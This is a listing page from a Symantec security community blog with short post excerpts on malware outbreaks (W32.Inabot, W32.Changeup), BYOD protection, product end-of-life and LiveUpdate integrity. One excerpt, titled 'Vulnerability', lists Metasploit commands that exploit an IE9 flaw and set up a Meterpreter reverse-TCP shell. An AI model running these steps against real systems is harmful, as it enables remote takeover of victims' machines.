Video Screencast Help
Search Video Help Close Back
to help

Security Community Blog

Showing posts tagged with 10.x
Showing posts in English
W32.Inabot - Support Perspective and Battle Plan
Brandon Noble | 25 Apr 2013 | 2 comments

I. BACKGROUND:
We have been receiving a few scattered cases of outbreaks from a file labeled snkb00ptz.exe or snkb0ptz.exe, but it seems to be on the rise.

It's normally considered poor troubleshooting to use the file name for any type of identification of a threat, but recent examples have made this practical. Even though these files were detected as many different threat names and families (Trojan.gen, w32.IRCBot.NG, Downloader, etc), the cases all reported the same behavior and symptoms.

After some additional investigation, Symantec Security Response has broken out detection for W32.Inabot. That's short for the Insomnia IRC bot. More information is available from the makers of this threat in their manual, here: http://pastebin.com/dvpu8Zwb

For those of you familiar with W32.Changeup, much of this...

Read more
Using Symantec Protection Suite Enterprise Edition (SPS EE) to protect user-owned tablets and smartphones from Internet threats
Duncan Mills | 04 Apr 2013 | 0 comments

The increased use in the workplace of user-owned devices such as smartphones and tablets, often referred to as bring your own device (BYOD), provides businesses with significant productivity and cost benefits. However, it also presents a number of complex challenges related to security.

Due to the rise of smart media devices like smartphones, tablets and ultrabooks, it is estimated that potentially, as many as 30-35%* of endpoints connected to a company’s network could be unmanaged. These are more at risk than managed endpoints which are typically subject to software patching and endpoint security policies.

Of course unmanaged endpoints are still protected by your perimeter security, such as secure web gateways. However, these have typically evolved from caching proxies and URL filters. What you need is an additional layer of security that provides the best possible levels of protection for unmanaged endpoints.

Symantec Web Gateway (SWG) will...

Read more
Evolving Endpoint Security
Vikram Kumar-SAV to SEP | 05 Feb 2013 | 0 comments

 

Symantec keeps tab on the changing Threat Landscape and incorporates relevant security on its products.Same is the story with SAV to SEP to now SEP 12..

When we had SAV in the market what our customer needed was just a Antivirus to protect their system from downtime..here antivirus was looked more as a Availability facilitator than a core security product..till early 2000.

Even though we had SCS (firewall and IPS) seclected people used the other features.

Starting from 2006-2007 that was a high rise in malware being created and vulnerabilities being exploited..slowly the trend changed and it all came down to money making malwares..

FakeAntivirus, Downadup, Various Blackmailing Trojans etc..here the audience was not high profile..and SEP 11 very well detect and blocks and does whatever it can..Slowly people started using IPS, ADC and found much more can be done with SEP and they are doing it..

However in last few years there has been...

Read more
W32.Changeup keeps on giving
Brandon Noble | 17 May 2013 | 12 comments

I. BACKGROUND:
In mid-2009, W32.Changeup, was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created.  Since November 2012 we have seen weekly spikes the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.

 

II. THREAT DETAILS:
When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...

Read more
Vulnerability
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Read more
Java 0-Day Coverage
Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
Read more
Symantec Anti-Virus 10 End-of-Life Announcement.
Nick Kelly | 24 Jul 2011 | 0 comments

Just an FYI if there is still a SAV installation in your environment. Symantec Anti-Virus patch releases and assisted support will be end-of-life next year. For assistance in migrating to SEP, please contact your local account team.  For operating systems and applications not supported by SEP, there are alternative solutions in the Symantec product portfolio that can help protect your environment.

 

http://www.symantec.com/business/support/index?page=releasedetails&key=51852

 

SAV 10 original Release Date: 2005-04-27

End of Engineering Support 2012-07-04  (Last date for patch releases)

End of Assisted Support 2012-07-04 (Last date to contact support)

 

Thanks!

Read more
Job Opportunity: Symantec Security Consultant
Chad Dupin | 01 Jun 2011 | 0 comments

ITS Partner is looking to hire a few Symantec Security Consultants / Engineers.

 

Location

West Michigan / Grand Rapids, MI Area.

Job Summary

This position will be focused on the implementation of Symantec security products within various customer environments. Job responsibilities include assessing customer needs and expectations, designing solutions to meet those needs, and then implementing the design. In addition to these activities the consultant will participate in the sales process (proposal creation, presentations, sales calls, demos, etc.). This position has the opportunity to grow into a leadership role within ITS to help guide and direct the security team.

Preferred Technical Qualifications

  • Symantec Endpoint Protection
  • Symantec Endpoint Encryption
  • Symantec Data Loss Prevention
  • Control Compliance Suite
  • PGP

Technical Knowledge

...
Read more
How is the content downloaded via LU secure?
P_K_ | 25 Jan 2011 | 0 comments

How is the content downloaded via LU secure?

The Live update TRI files are downloaded in an archive format

These minitri’s and livetri.zip files consists of 3 files

  • liveupdt.sig
  • liveupdt.grd
  • liveupdt.tri

GRD and SIG files are used to verify security and integrity of patches

The Mini-tri Zip is Validated by GRD file and also Authenticated by SIG file

The  Guard file use  SHA-1 hash values

For Live update the protocols that are used is  HTTP/FTP server. These live update is hosted by Akamai.

Published using Java Triage and they are Signed by Symantec Digital Signing Servers.

Read more
Your opportunity to provide usability feedback about security products
UCD4me | 05 Jan 2011 | 0 comments

The User Centered Design (UCD) team here at Symantec exists to help make customer experiences easier, more efficient and more useful for you.  Right now, we're ramping up several research projects where we are looking for those in security and compliance with a manger, director or CISO role to give us feedback in the form of short user stories.  This should require only a 30-45 minute commitment on the phone to share experiences and points of pain, and this effort is "product agnostic" so as long as you are involved with security, regardless of products used, we'd like to hear from you!

 

If you are interested, please email Kellie Mecham at kellie_mecham@symantec.com to arrange a date and time for the phone interview. 

 

We look forward to hearing from you!

 

Best wishes,

 

Kellie

 

 

Read more